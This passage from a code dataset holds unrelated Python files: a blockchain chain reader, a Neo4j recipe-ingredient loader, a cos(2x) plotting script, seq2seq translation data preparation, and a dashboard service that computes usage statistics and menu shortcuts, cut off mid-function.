os\n\ndef readChain(path):\n\n with open(path, 'r') as file:\n chain = json.load(file)\n \n for block in chain:\n print(\"Block index:\", block['index'])\n print('Timestamp:', block['timeStamp'])\n print('Transactions:')\n for tmp in block['transaction']:\n print(' ', tmp['sender'], '->', tmp['receiver'], '(', tmp['amount'], ')')\n print('Previous hash:', block['previousHash'])\n print('Hash:', block['hash'])\n print('Nonce:', block['nonce'])\n print()\n\ndef main():\n path = input('Enter path to chain: ')\n if os.path.isfile(path):\n readChain(path)\n else:\n print('Error! File not found')\n\n\nif __name__ == '__main__':\n main()","repo_name":"Chmilko/blockchain","sub_path":"readChain.py","file_name":"readChain.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71597948318","text":"from collections import defaultdict\nimport json\nimport os\n\nfrom database.neo4j import neo4j_db\n\nclass TranslateService:\n def __init__(self) -> None:\n pass\n \n @staticmethod\n def get_ingredients_json():\n path = os.getcwd() + \"/data/ingredients.json\"\n with open(path, \"rt\", encoding=\"UTF8\") as f:\n data = json.load(f)\n \n return data\n \n def insert_ingredients(self):\n data = self.get_ingredients_json()\n\n recipes = defaultdict(dict)\n \n for ing in data:\n key = ing[\"RECIPE_ID\"]\n recipes[key] = {\n \"recipe_id\": key,\n \"ingredients\": [*recipes[key].get(\"ingredients\", []), {\n \"order\": ing[\"IRDNT_SN\"],\n \"name_kr\": ing[\"IRDNT_NM\"], \n \"amount\": ing[\"IRDNT_CPCTY\"], \n \"type_code\": ing[\"IRDNT_TY_CODE\"], \n \"type_kr\": ing[\"IRDNT_TY_NM\"],\n }]\n }\n \n new_recipes = list(recipes.values())\n\n neo_result = neo4j_db.execute_write(\n query=\"\"\"\n UNWIND $recipes AS recipe\n MERGE (r:Recipe { recipe_id: recipe.recipe_id })\n ON CREATE\n SET r.uuid = randomUUID(),\n r.created_at = datetime()\n ON MATCH\n SET r.updated_at = datetime()\n\n WITH r, recipe\n\n UNWIND recipe.ingredients AS ing\n MERGE (i:Ingredient { name: ing.name_kr })\n ON CREATE\n SET i.uuid = randomUUID(),\n i.created_at = datetime()\n ON MATCH \n SET i.updated_at = datetime()\n \n MERGE (r)-[m:MADE_BY]->(i)\n ON CREATE\n SET m.order = ing.order,\n m.amount = ing.amount,\n m.type = ing.type_kr,\n m.type_code = ing.type_code,\n m.created_at = datetime()\n ON MATCH\n SET m.updated_at = datetime()\n \"\"\",\n params={ \"recipes\": new_recipes }\n )\n \n return neo_result\n","repo_name":"Bernese-Corgi/Neo4J","sub_path":"Food-GDB/service/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32441471135","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport sympy as sp\n\n# Given sin(x) = 3/5\nsin_x = 3/5\ncos_x = np.sqrt(1 - sin_x**2) # Calculate cos(x)\n\n# Calculate cos(2x)\ncos_2x = cos_x**2 - sin_x**2\n\n# Create a symbolic representation for cos(2x)\nx = sp.symbols('x')\ncos_2x_symbolic = sp.cos(2*x)\n\n# Simplify cos(2x) symbolically\ncos_2x_simplified = sp.simplify(cos_2x_symbolic.subs(x, sp.acos(sin_x)))\n\n# Display the result\nprint(f'cos(2x) = {cos_2x:.2f}')\nprint(f'Simplified cos(2x) = {cos_2x_simplified}')\n\n# Create a 3D visualization\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n# Define the angle range\ntheta = np.linspace(0, 2 * np.pi, 100)\nphi = np.linspace(0, np.pi, 100)\ntheta, phi = np.meshgrid(theta, phi)\n\n# Parametric equations for a sphere\nx = np.sin(phi) * np.cos(theta)\ny = np.sin(phi) * np.sin(theta)\nz = np.cos(phi)\n\n# Plot the sphere\nax.plot_surface(x, y, z, color='b', alpha=0.7)\n\n# Plot a point representing (cos(x), sin(x), 0)\nax.scatter([cos_x], [sin_x], [0], color='r', s=100, label='(cos(x), sin(x), 0)')\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Z')\nax.legend()\n\nplt.show()\n","repo_name":"sksalahuddin2828/Data_Visualization_II","sub_path":"Simplified_cos(2x).py","file_name":"Simplified_cos(2x).py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"51"} +{"seq_id":"5638488751","text":"import glob\nimport unicodedata\nimport re\nfrom random import shuffle\n\n'''\nOnly use this function in this module below\n\nprepare_data(lang1_name, lang2_name, n_words, reverse=False)\n'''\n\n\ndef read_sentences(input_filename, target_filename, n_words, down_margin):\n input_lines = open(input_filename).read().strip().split('\\n')\n target_lines = open(target_filename).read().strip().split('\\n')\n \n targets = []\n for i, input_line in enumerate(input_lines):\n seq_list_len = len(input_line.split(' '))\n if n_words - down_margin <= seq_list_len < n_words:\n targets.append((input_line, target_lines[i]))\n\n return targets\n\n\ndef unicode_to_ascii(s):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n )\n\n\ndef normalize_string(s):\n s = unicode_to_ascii(s.lower().strip())\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n return s\n\n\ndef read_langs(lang1, lang2, n_words, down_margin, reverse=False):\n all_filenames = glob.glob('data/europarl-v*.fr-en.*')\n print(all_filenames)\n\n print(\"Reading lines...\")\n\n pairs = read_sentences(all_filenames[0], all_filenames[1], n_words, down_margin)\n # Reverse pairs, make Lang instances\n if reverse:\n pairs = [list(reversed(p)) for p in pairs]\n input_lang = Lang(lang2)\n output_lang = Lang(lang1)\n else:\n input_lang = Lang(lang1)\n output_lang = Lang(lang2)\n\n return input_lang, output_lang, pairs\n\n\ndef filter_pair(pair, func):\n return func(pair[0]), func(pair[1])\n\n\ndef filter_pairs(pairs, func):\n return [(filter_pair(pair, func)) for pair in pairs]\n\n\ndef split_data(data, test_ratio):\n test_set_size = int(len(data) * test_ratio)\n return data[:test_set_size], data[test_set_size:]\n\n\ndef prepare_data(lang1_name, lang2_name, n_words, down_margin, reverse=False):\n input_lang, output_lang, pairs = read_langs(lang1_name, lang2_name, n_words, down_margin, reverse)\n print(\"Read %s sentence pairs\" % len(pairs))\n\n pairs = filter_pairs(pairs, normalize_string)\n ret_pairs = []\n max_input_len = 0\n max_target_len = 0\n\n for pair in pairs:\n input_seq_len = len(pair[0].split(\" \"))\n target_seq_len = len(pair[0].split(\" \"))\n if n_words - down_margin <= input_seq_len < n_words and \\\n n_words - down_margin <= target_seq_len < n_words:\n ret_pairs.append(pair)\n \n if max_input_len < input_seq_len:\n max_input_len = input_seq_len\n if max_target_len < target_seq_len:\n max_target_len = target_seq_len\n\n print(\"Trimmed to %s sentence pairs\" % len(ret_pairs))\n\n print(\"Indexing words...\")\n for pair in ret_pairs:\n input_lang.index_words(pair[0])\n output_lang.index_words(pair[1])\n\n print(\"Spliting sentence pairs...\")\n test_pairs, train_pairs = split_data(ret_pairs, 0.2)\n\n print(\"====== Total Data ======\")\n print(\"Train Sentence pairs: \", len(train_pairs))\n print(\"Test Sentence pairs: \", len(test_pairs))\n print(lang1_name, 'n_words: ', input_lang.n_words, 'max_len: ', max_input_len)\n print(lang2_name, 'n_words: ', output_lang.n_words, 'max_len: ', max_target_len)\n\n return input_lang, output_lang, train_pairs, test_pairs\n\n\nclass Lang:\n def __init__(self, name):\n self.name = name\n self.word2index = {\"SOS\": 0, \"EOS\": 1, \"PAD\": 2, \"UNK\": 3}\n self.word2count = {}\n self.index2word = {0: \"SOS\", 1: \"EOS\", 2:\"PAD\", 3:\"UNK\"}\n self.n_words = 4 # Count SOS and EOS\n\n def index_words(self, sentence):\n for word in sentence.split(' '):\n self.index_word(word)\n\n def index_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1\n","repo_name":"Taekyoon/Pytorch_Seq2Seq_Tutorial","sub_path":"data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"73300255837","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n------------------------------------------------\n\ndescribe: \n\nbase_info:\n __author__ = \"PyGo\"\n __time__ = \"2022/8/19 15:31\"\n __version__ = \"v.1.0.0\"\n __mail__ = \"gaoming971366@163.com\"\n __blog__ = \"www.pygo2.top\"\n __project__ = \"open2lisapi\"\n\nusage:\n\ndesign:\n\nreference urls:\n\npython version:\n python3\n\n\nEnjoy the good life everyday!!!\nLife is short, I use python.\n\n------------------------------------------------\n\"\"\"\n\n# ------------------------------------------------------------\n# usage: /usr/bin/python dashboard.py\n# ------------------------------------------------------------\nfrom collections import OrderedDict\n\nfrom deploy.utils.utils import get_now, get_day_week_date, get_now_date, \\\n d2s\nfrom deploy.bo.sysuser import SysUserBo\nfrom deploy.bo.request import RequestBo\nfrom deploy.bo.menu import MenuBo\nfrom deploy.bo.role import RoleBo\nfrom deploy.bo.shortcut import ShortCutBo\nfrom deploy.utils.status import Status\nfrom deploy.utils.status_msg import StatusMsgs\nfrom deploy.config import ADMIN\n\n\nMAX = 15\n\n\nclass DashboardService(object):\n \"\"\"\n dashboard service\n \"\"\"\n\n # 用户\n req_user_necessary_attrs = ['rtx_id']\n\n # 数据md5\n req_md5_necessary_attrs = ['rtx_id', 'md5']\n\n # define many request api parameters\n # 分页数据通用请求参数\n req_page_comm_attrs = [\n 'rtx_id',\n 'limit',\n 'offset'\n ]\n\n req_pan_attrs = [\n 'rtx_id'\n ]\n\n req_pan_chart_attrs = [\n 'rtx_id',\n 'type'\n ]\n\n req_index_chart_attrs = [\n 'rtx_id',\n 'type'\n ]\n\n req_shortcut_attrs = [\n 'rtx_id'\n ]\n\n req_shortcut_edit_attrs = [\n 'rtx_id'\n ]\n\n req_shortcut_save_attrs = [\n 'rtx_id',\n 'select'\n ]\n\n def __init__(self):\n \"\"\"\n DashboardService class initialize\n \"\"\"\n super(DashboardService, self).__init__()\n # bo\n self.sysuser_bo = SysUserBo()\n self.request_bo = RequestBo()\n self.menu_bo = MenuBo()\n self.role_bo = RoleBo()\n self.shortcut_bo = ShortCutBo()\n\n def __str__(self):\n print(\"DashboardService class\")\n\n def __repr__(self):\n self.__str__()\n\n def pan(self, params: dict) -> dict:\n \"\"\"\n dashboard pan chart data\n contain:\n pan:\n - user 用户\n - click 点击率\n \"\"\"\n # ================= parameters check and format ====================\n if not params:\n return Status(\n 212, 'failure', StatusMsgs.get(212), {}).json()\n # **************************************************************************\n \"\"\"inspect api request necessary parameters\"\"\"\n for _attr in self.req_pan_attrs:\n if _attr not in params.keys():\n return Status(\n 212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n \"\"\"end\"\"\"\n # **************************************************************************\n # new parameters\n new_params = dict()\n for k, v in params.items():\n if not k: continue\n if k not in self.req_pan_attrs: # illegal key\n return Status(\n 213, 'failure', u'请求参数%s不合法' % k, {}).json()\n if not v: # value is not null\n return Status(\n 214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n new_params[k] = str(v)\n # ---------------- parameter initialize ----------------\n rtx_id = new_params.get('rtx_id')\n now_date = get_now(format=\"%Y-%m-%d\")\n date_params = {\n \"start_time\": \"%s 00:00:00\" % now_date,\n \"end_time\": \"%s 23:59:59\" % now_date\n }\n # <<<<<<<<<<<<<<<< get return pan: user >>>>>>>>>>>>>>>\n # 总用户数\n # user = self.sysuser_bo.get_count() or 1\n # 当日登录用户数\n user = self.request_bo.get_user_count_by_time(date_params) or 1\n # <<<<<<<<<<<<<<<< get return pan: click >>>>>>>>>>>>>>>\n click = self.request_bo.get_req_count_by_time(date_params)\n click = click[0] if click else 1\n if click == 0: click = 1 # 防止分母为0\n # <<<<<<<<<<<<<<<< get return pan: click >>>>>>>>>>>>>>>\n \"\"\" 本日操作数 / 总的API数量\"\"\"\n operate = self.request_bo.get_req_operate_by_time(date_params)\n operate = operate[0] if operate else 0\n ret_res_json = {\n 'user': user,\n 'click': click,\n 'operate': round(operate/click * 100, 2)\n }\n # return data\n return Status(\n 100, 'success', StatusMsgs.get(100), ret_res_json\n ).json()\n\n @staticmethod\n def _pan_chart_title(chart_type: str) -> str:\n \"\"\"\n get dashboard pan chart title\n return string\n \"\"\"\n if not chart_type:\n return \"本周数据活跃情况\"\n\n if chart_type == 'user':\n return '本周用户登录情况'\n elif chart_type == 'click':\n return '本周功能点击数情况'\n elif chart_type == 'operate':\n return '本周功能使用率情况'\n else:\n return \"本周数据活跃情况\"\n\n def pan_chart(self, params: dict) -> dict:\n \"\"\"\n get dashboard pan chart data\n contain:\n - user 用户\n - click 点击率\n - operate 操作率\n \"\"\"\n # ================= parameters check and format ====================\n if not params:\n return Status(\n 212, 'failure', StatusMsgs.get(212), {}).json()\n # **************************************************************************\n \"\"\"inspect api request necessary parameters\"\"\"\n for _attr in self.req_pan_chart_attrs:\n if _attr not in params.keys():\n return Status(\n 212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n \"\"\"end\"\"\"\n # **************************************************************************\n # new parameters\n new_params = dict()\n for k, v in params.items():\n if not k: continue\n if k not in self.req_pan_chart_attrs: # illegal key\n return Status(\n 213, 'failure', u'请求参数%s不合法' % k, {}).json()\n if not v: # value is not null\n return Status(\n 214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n if k == 'type' and v not in ['user', 'click', 'operate']:\n return Status(\n 213, 'failure', u'请求参数%s值不合法' % k, {}).json()\n new_params[k] = str(v)\n # ---------------- parameter initialize ----------------\n rtx_id = new_params.get('rtx_id')\n _type = new_params.get('type')\n local_week = get_day_week_date(get_now_date())\n date_params = {\n \"start_date\": local_week.get('start_week_date'),\n \"end_date\": local_week.get('end_week_date')\n }\n if _type == 'user':\n # <<<<<<<<<<<<<<<< get return user 本周 >>>>>>>>>>>>>>>\n # 当日登录用户数 用sql进行查询\n _sql = \"\"\"\n select \n create_date, count(1)\n from (\n select \n create_date as create_date, rtx_id as rtx_id\n from request\n where create_date BETWEEN '%s' and '%s'\n group by create_date, rtx_id\n )t\n group by create_date\n order by create_date asc\n \"\"\" % (date_params.get('start_date'), date_params.get('end_date'))\n ret_res = self.request_bo.execute_sql(_sql)\n elif _type == 'click':\n # <<<<<<<<<<<<<<<< get return click 本周 >>>>>>>>>>>>>>>\n ret_res = self.request_bo.get_req_count_by_week(date_params) or []\n elif _type == 'operate':\n # <<<<<<<<<<<<<<<< get return operate 本周 >>>>>>>>>>>>>>>\n \"\"\"总数\"\"\"\n ret_res_sum = self.request_bo.get_req_count_by_week(date_params) or []\n \"\"\"数据操作数\"\"\"\n ret_res_count = self.request_bo.get_req_operate_count_by_week(date_params) or []\n ret_res = list()\n _temp_list = dict()\n # 把操作类型数据格式化为dict\n for _c in ret_res_count:\n if not _c: continue\n _temp_list[_c[0]] = _c[1]\n # 把对应日期的数据进行求率\n for _s in ret_res_sum:\n if not _s: continue\n v = _temp_list[_s[0]] if _s[0] in _temp_list.keys() else 0\n ret_res.append((_s[0], round(v/_s[1] * 100, 2)))\n del _temp_list\n else:\n ret_res = list()\n # -------------- 格式化数据 --------------\n \"\"\"\n 1.创建一个有序字典,里面星期数据初始化为0\n 2.遍历数据,更新有序字典星期数据\n 3.把星期数据遍历到列表\n 4.return\n \"\"\"\n _ret_week_dict = OrderedDict()\n for day in local_week.get('week_date'): # 初始化数据,默认为0\n if not day: continue\n _ret_week_dict[day] = 0\n \"\"\" ======== 在ret_res不为空情况下进行遍历 ======== \"\"\"\n if ret_res:\n for _r in ret_res: # 遍历每一个指定格式数据:date count\n if not _r: continue\n _date = _r[0]\n if not isinstance(_date, str): # 转换日期为str类型\n _date = d2s(_date, fmt=\"%Y-%m-%d\")\n if _date in _ret_week_dict.keys(): # 存在 && 更新\n _ret_week_dict[_date] = _r[1]\n # return data\n _ret_d = {\n 'title': self._pan_chart_title(_type),\n 'subtitle': '%s ~ %s' % (local_week.get('start_week_date'), local_week.get('end_week_date')),\n 'data': list(_ret_week_dict.values())\n }\n return Status(\n 100, 'success', StatusMsgs.get(100), _ret_d\n ).json()\n\n def _get_index_one(self):\n \"\"\"\n 指标1:系统功能累积使用情况\n \"\"\"\n func_names = {\n 'office.excel_merge': \"表格合并\",\n 'office.excel_split': \"表格拆分\",\n 'office.office_pdf_to': \"PDF转WORD\",\n 'notify.dtalk_send': \"钉钉绩效\",\n 'notify.qywx_send': \"企微通知\",\n 'search.sqlbase_add': \"SQL仓库\"\n }\n # <<<<<<<<<<<<<<<<<< get all func rank >>>>>>>>>>>>>>>>>>>\n _res = self.request_bo.get_func_rank(params={'func_names': list(func_names.keys())})\n _ret_dict = OrderedDict()\n for key in func_names.keys(): # 初始化数据,默认为0\n if not key: continue\n _ret_dict[key] = 0\n \"\"\" ======== 在ret_res不为空情况下进行遍历 ======== \"\"\"\n if _res:\n for _r in _res: # 遍历每一个指定格式数据:date count\n if not _r: continue\n if _r and _r[0] not in func_names.keys(): continue\n _k = _r[0]\n _ret_dict[_k] = _r[1] # 存在 && 更新\n _ret_res = list()\n for k, v in _ret_dict.items():\n if not k: continue\n _ret_res.append({\"name\": func_names.get(k), \"value\": v})\n _ret_data = {\n 'data': _ret_res,\n 'legend': list(func_names.values()),\n 'title': '工具累积使用排名TOP%s' % len(func_names)\n }\n return _ret_data\n\n def _get_index_three(self):\n \"\"\"\n 指标3:本周API请求排行榜\n \"\"\"\n # 不展示指标列表API\n no_show_endpoint = [\n 'user.auth'\n ]\n # 最大展示指标数量\n SHOW_INDEX_MAX = 5\n api_endpoints = list()\n # 本周日期\n local_week = get_day_week_date(query_date=get_now(format=\"%Y-%m-%d\"))\n params = {\n 'start_time': '%s 00:00:00' % local_week.get('start_week_date'),\n 'end_time': '%s 23:59:59' % local_week.get('end_week_date')\n }\n # <<<<<<<<<<<<<<<<<<<< get all func rank: 索取本周请求做多API>>>>>>>>>>>>>>>>>>>>>>\n api_res = self.request_bo.get_func_rank(params=params)\n start = 0\n for _d in api_res:\n \"\"\"\n continue:\n - 无数据 \n - 指定api endpoint\n - dashboard.%\n \"\"\"\n if not _d or _d[0] in no_show_endpoint \\\n or str(_d[0]).startswith('dashboard.'): continue\n api_endpoints.append(_d[0])\n start += 1\n if start >= SHOW_INDEX_MAX:\n break\n\n # <<<<<<<<<<<<<<<<<<<< 获取指定API本周次数 >>>>>>>>>>>>>>>>>>>>>>\n params['func_names'] = api_endpoints\n _res = self.request_bo.get_func_rank_group_by_api_date(params=params)\n _ret_dict = OrderedDict()\n for _d in api_endpoints: # 初始化数据,默认为0\n if not _d: continue\n _ret_dict[_d] = [0, 0, 0, 0, 0, 0, 0] # 本周数据初始化0\n \"\"\" ======== 在ret_res不为空情况下进行遍历 ======== \"\"\"\n if _res:\n week_dates = local_week.get('week_date') # 本周日期的列表,用于记录哪一天\n for _r in _res: # 遍历每一个指定格式数据:date count\n if not _r: continue\n if _r[0] not in api_endpoints: continue\n index = week_dates.index(d2s(_r[1], fmt=\"%Y-%m-%d\")) # 记录索引,代表周一 ~ 周末 下角标\n try:\n if index > 7: continue # 不是本周的数据\n except:\n continue\n _ret_dict[_r[0]][index] = _r[2] # api endpoint -> date -> update\n _ret_list = list()\n for api in api_endpoints:\n if not api: continue\n _ret_list.append(_ret_dict.get(api))\n # 按API顺序加载\n _ret_res = {\n 'data': _ret_list,\n 'legend': api_endpoints,\n 'title': '本周API请求次数排名TOP%s' % SHOW_INDEX_MAX,\n 'subtitle': '%s ~ %s' % (local_week.get('start_week_date'), local_week.get('end_week_date'))\n }\n return _ret_res\n\n def index(self, params: dict) -> dict:\n \"\"\"\n dashboard index chart data initialize\n 指标数据 contain:\n index one 指标一:工具累积使用情况\n index two 指标二:\n index three 指标三:本周API请求排行榜\n \"\"\"\n # ================= parameters check and format ====================\n if not params:\n return Status(\n 212, 'failure', StatusMsgs.get(212), {}).json()\n # **************************************************************************\n \"\"\"inspect api request necessary parameters\"\"\"\n for _attr in self.req_index_chart_attrs:\n if _attr not in params.keys():\n return Status(\n 212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n \"\"\"end\"\"\"\n # **************************************************************************\n # new parameters\n new_params = dict()\n for k, v in params.items():\n if not k: continue\n if k not in self.req_index_chart_attrs: # illegal key\n return Status(\n 213, 'failure', u'请求参数%s不合法' % k, {}).json()\n if not v: # value is not null\n return Status(\n 214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n new_params[k] = str(v)\n # ---------------- parameter initialize ----------------\n rtx_id = new_params.get('rtx_id')\n _type = new_params.get('type')\n ret_res_json = list()\n # <<<<<<<<<<<<<<<< get return index: 功能使用率 >>>>>>>>>>>>>>>\n if _type == '1':\n ret_res_json = self._get_index_one()\n elif _type == '2':\n pass\n elif _type == '3':\n ret_res_json = self._get_index_three()\n else:\n pass\n\n # return data\n return Status(\n 100, 'success', StatusMsgs.get(100), ret_res_json\n ).json()\n\n def shortcut(self, params: dict) -> dict:\n \"\"\"\n dashboard short cut data\n :return: json data\n\n 根据用户的角色权限,展示二级菜单快捷入口。\n 思路:\n 1.参数check and format\n 2.获取全部菜单\n 3.shortcut数据获取\n 4.依据是否有shortcut数据进行情况判断\n 4.1 有:直接格式化数据返回\n 4.2 无:\n 4.2.1 用户数据与用户权限数据check\n 4.2.2 只取二级菜单 && 在权限id集合的菜单,如果shortcut为空,展示所有数据\n 最多15个\n\n 之所以这么做的原因在于如果设置了shortcut可以直接格式化数据进行返回,省去每次都需要判断用户、角色的情况\n \"\"\"\n # ================= 1 - parameters check and format ====================\n if not params:\n return Status(\n 212, 'failure', StatusMsgs.get(212), {}).json()\n # **************************************************************************\n \"\"\"inspect api request necessary parameters\"\"\"\n for _attr in self.req_shortcut_attrs:\n if _attr not in params.keys():\n return Status(\n 212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n \"\"\"end\"\"\"\n # **************************************************************************\n # new parameters\n new_params = dict()\n for k, v in params.items():\n if not k: continue\n if k not in self.req_shortcut_attrs: # illegal key\n return Status(\n 213, 'failure', u'请求参数%s不合法' % k, {}).json()\n if not v: # value is not null\n return Status(\n 214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n new_params[k] = str(v)\n\n # >>>>>>>>> 定义结果数据\n count = 0 # 最多展示15个快捷菜单\n ret_res_json = []\n rtx_id = new_params.get('rtx_id').strip() # 去空格\n\n # -------------------- 2 - menu --------------------\n \"\"\"目的是与二级菜单拼接\"\"\"\n _res = self.menu_bo.get_all(root=False)\n # 一级菜单【id-path】\n _one_level_menu = dict()\n for _r in _res:\n if not _r: continue\n if _r.level != 1: continue\n _one_level_menu[_r.id] = _r.path\n # -------------------- 3 - user shortcut --------------------\n shortcut = self.shortcut_bo.get_model_by_rtx(rtx_id)\n shortcut_list = list()\n if shortcut and shortcut.shortcut:\n shortcut_list = [int(x) for x in shortcut.shortcut.split(';') if x]\n # -------------------- 4 - 依据是否有shortcut数据进行情况判断 --------------------\n \"\"\" <<<<<<<<<<<<<<<<<<<<<<<<<<< 情况一 >>>>>>>>>>>>>>>>>>>>>>>>>>>\"\"\"\n if shortcut_list:\n for _r in _res:\n \"\"\" 过滤无数据/根节点/一级菜单/MENU不显示快捷入口\"\"\"\n if not _r: continue\n if _r.level != 2: continue # 去掉根、一级菜单,只留二级菜单\n if not _r.is_shortcut: continue # 去掉快捷入口设置不显示菜单\n if int(_r.id) in shortcut_list:\n count += 1\n ret_res_json.append({\n 'name': _r.title,\n 'icon': _r.icon,\n 'path': \"%s/%s\" % (_one_level_menu.get(_r.pid), _r.path)\n })\n if count >= MAX:\n break\n # return data\n return Status(\n 100, 'success', StatusMsgs.get(100), ret_res_json).json()\n\n \"\"\" <<<<<<<<<<<<<<<<<<<<<<<<<<< 情况二 >>>>>>>>>>>>>>>>>>>>>>>>>>>\"\"\"\n # -------------------- 4.2.1 - check user and roles --------------------\n # get user by rtx\n user = self.sysuser_bo.get_auth_by_rtx(rtx_id)\n # user model is not exist\n if not user:\n return Status(\n 202, 'failure', StatusMsgs.get(202) or u'用户未注册', {}).json()\n # user model is deleted\n if user.is_del:\n return Status(\n 203, 'failure', StatusMsgs.get(203) or u'用户已注销', {}).json()\n # 判断是否管理员,如果是管理员是全部菜单权限\n # 多角色,if包含管理员,直接是管理员权限\n roles = str(user.role).split(';') if user.role else [] # 分割多角色\n is_admin = True if ADMIN in roles \\\n else False\n auth_list = list()\n if not is_admin:\n # get authority by role list\n # user is admin, not get role, all authority menu\n role_models = self.role_bo.get_models_by_engnames(roles)\n for _r in role_models:\n if not _r or not _r.authority: continue\n auth_list.extend([int(x) for x in _r.authority.split(';') if x])\n auth_list = list(set(auth_list)) # 去重\n # auth_list.sort() # 排序\n # --------------- 4.2.2.return legal data ---------------\n for _r in _res:\n \"\"\" 过滤无数据/根节点/一级菜单/MENU不显示快捷入口\"\"\"\n if not _r: continue\n if _r.level != 2: continue # 去掉根、一级菜单,只留二级菜单\n if not _r.is_shortcut: continue # 去掉快捷入口设置不显示菜单\n if is_admin: # 具备管理员角色\n count += 1\n ret_res_json.append({\n 'name': _r.title,\n 'icon': _r.icon,\n 'path': \"%s/%s\" % (_one_level_menu.get(_r.pid), _r.path)\n })\n elif int(_r.id) in auth_list: # 用户权限\n count += 1\n ret_res_json.append({\n 'name': _r.title,\n 'icon': _r.icon,\n 'path': \"%s/%s\" % (_one_level_menu.get(_r.pid), _r.path)\n })\n if count >= MAX:\n break\n # return data\n return Status(\n 100, 'success', StatusMsgs.get(100), ret_res_json).json()\n\n def shortcut_edit(self, params: dict) -> dict:\n \"\"\"\n dashboard short cut edit data list\n :return: json data\n\n 1.参数检查 && 新参数格式化\n 2.用户角色数据判断,获取角色权限数据\n 3.shortcut数据\n 4.全部菜单数据\n 5.按shortcut数据进行分组,返回UnSelect【未选】,Select【已选】2组数据\n 条件:在shortcut列表中 && 在角色权限中\n \"\"\"\n # ================= 1 - parameters check and format ====================\n if not params:\n return Status(\n 212, 'failure', StatusMsgs.get(212), {}).json()\n # **************************************************************************\n \"\"\"inspect api request necessary parameters\"\"\"\n for _attr in self.req_shortcut_edit_attrs:\n if _attr not in params.keys():\n return Status(\n 212, 'failure', u'缺少请求参数%s' % _attr or StatusMsgs.get(212), {}).json()\n \"\"\"end\"\"\"\n # **************************************************************************\n # new parameters\n new_params = dict()\n for k, v in params.items():\n if not k: continue\n if k not in self.req_shortcut_edit_attrs: # illegal key\n return Status(\n 213, 'failure', u'请求参数%s不合法' % k, {}).json()\n if not v: # value is not null\n return Status(\n 214, 'failure', u'请求参数%s不允许为空' % k, {}).json()\n new_params[k] = str(v)\n # -------------------- 2 - check user data and roles --------------------\n rtx_id = new_params.get('rtx_id').strip() # 去空格\n # get user by rtx\n user = self.sysuser_bo.get_auth_by_rtx(rtx_id)\n # user model is not exist\n if not user:\n return Status(\n 202, 'failure', StatusMsgs.get(202) or u'用户未注册', {}).json()\n # user model is deleted\n if user.is_del:\n return Status(\n 203, 'failure', StatusMsgs.get(203) or u'用户已注销', {}).json()\n # 判断是否管理员,如果是管理员是全部菜单权限\n # 多角色,if包含管理员,直接是管理员权限\n roles = str(user.role).split(';') if user.role else [] # 分割多角色\n is_admin = True if ADMIN in roles \\\n else False\n auth_list = list()\n if not is_admin:\n # get authority by role list\n # user is admin, not get role, all authority menu\n role_models = self.role_bo.get_models_by_engnames(roles)\n for _r in role_models:\n if not _r or not _r.authority: continue\n auth_list.extend([int(x) for x in _r.authority.split(';') if x])\n auth_list = list(set(auth_list)) # 去重\n # -------------------- 3 - user shortcut --------------------\n shortcut = self.shortcut_bo.get_model_by_rtx(rtx_id)\n shortcut_list = list()\n # 只有设置了shortcut才有数据\n if shortcut and shortcut.shortcut:\n shortcut_list = [int(x) for x in shortcut.shortcut.split(';') if x]\n # -------------------- 4 - menu --------------------\n \"\"\"目的是与二级菜单拼接\"\"\"\n _res = self.menu_bo.get_all(root=False)\n # 一级菜单【只存储了id-title】\n _one_level_menu = dict()\n for _r in _res:\n if not _r: continue\n if _r.level != 1: continue\n _one_level_menu[_r.id] = _r.title or _r.name\n # --------------- 5.return UnSelect && Select ---------------\n select = list()\n unselect = list()\n # >>>>>>>>>>>>> 菜单数据过滤\n for _r in _res:\n \"\"\" 过滤无数据/根节点/一级菜单/MENU不显示快捷入口\"\"\"\n if not _r: continue\n if _r.level != 2: continue # 去掉root、一级菜单,只留二级菜单\n if not _r.is_shortcut: continue # 去掉menu快捷入口设置不显示菜单【管理员设置】\n \"\"\"\n TODO: 加入一下角色权限判断\n 菜单只有2种情况:\n 1.select【已选】:\n 数据加入select\n 2.unselect【未选】\n 2.1 如果是管理员,全部加入unselect\n 2.2 如果非管理员,判断是否有role权限,如果有加入unselect\n \"\"\"\n _d = {\n \"id\": _r.id, # 菜单id\n \"icon\": _r.icon, # 菜单图标\n \"name\": \"%s > %s\" % (_one_level_menu.get(_r.pid), _r.title or _r.name) # 菜单路径:一级菜单 > 二级菜单\n }\n if int(_r.id) in shortcut_list:\n select.append(_d)\n else:\n if is_admin: # 具备管理员角色\n unselect.append(_d)\n elif not is_admin and int(_r.id) in auth_list: # 用户设置权限\n unselect.append(_d)\n else: # 其他情况不加入\n pass\n # return data\n return Status(\n 100, 'success', StatusMsgs.get(100),\n {\"select\": select, \"unselect\": unselect}\n ).json()\n\n def shortcut_save(self, params: dict) -> dict:\n \"\"\"\n dashboard 